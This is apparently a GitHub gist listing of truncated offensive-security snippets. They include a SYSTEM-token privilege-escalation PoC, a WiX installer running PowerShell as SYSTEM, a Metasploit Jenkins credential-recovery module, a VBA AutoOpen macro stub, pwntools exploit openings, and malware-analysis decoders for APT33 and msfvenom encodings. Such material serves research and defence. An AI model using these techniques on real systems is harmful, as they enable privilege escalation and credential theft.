xpn / getsystem_parent.cpp
Created Nov 20, 2017
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
#include "stdafx.h"
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
TOKEN_PRIVILEGES tp;
LUID luid;
TOKEN_PRIVILEGES tpPrevious;
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;
xpn / msigen.wix
Created Nov 6, 2017
WIX file with embedded Powershell, which will be executed as SYSTEM
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
xpn / jenkins_passwords.rb
Created Oct 15, 2017
Recover Jenkins credentials in Meterpreter
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'nokogiri'
require 'digest'
require 'openssl'
require 'base64'
xpn / apt33_dropshot_decoder.py
Created Sep 20, 2017
IDAPython encrypted string decoder for DROPSHOT - APT33
import idc
import idaapi
from idautils import *
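# Addresses of the string-decryption table and routine in the analysed
# sample (constants specific to this binary).
decryptTable = 0x41BA3C
decryptTableEnd = 0x41BA77
decryptFunction = 0x4012A0
# Get the translation table.
# The byte count must be end - start; the original operands were reversed,
# which produced a negative size. The name `bytes` (shadowing the builtin)
# is kept so the rest of the script keeps working.
bytes = idaapi.get_many_bytes(decryptTable, decryptTableEnd - decryptTable)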
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Execute
xpn / wannacry_file_extensions.txt
Created May 12, 2017
A list of file extensions searched and encrypted by the WannaCry ransomware
.der
.pfx
.key
.crt
.csr
.p12
.pem
.odt
.ott
.sxw
from pwn import *
import struct
WIDTH = 1
HEIGHT = 1000000
LOCAL = False
if LOCAL:
FREE_HOOK_OFFSET = -1230952
from scapy.all import *
from scapy.utils import rdpcap
import sys
import struct
from pwn import *
MESSAGE_TYPE_SYN = 0x00
MESSAGE_TYPE_MSG = 0x1
MESSAGE_TYPE_PING = 0xFF
# r2pipe script using ESIL to decode the msfvenom x86/alpha_mixed encoder
import r2pipe
import sys
def dump(addr):
    """Placeholder hook; currently a no-op and ignores ``addr``."""
    pass
def startEsil():
r.cmd('e io.cache=true')
# r2pipe script using ESIL to decode the msfvenom jmp_call_additive XOR encoder
import r2pipe
import sys
def dump(addr):
    """Placeholder hook; currently a no-op and ignores ``addr``."""
    pass
def startEsil():
r.cmd('e io.cache=true')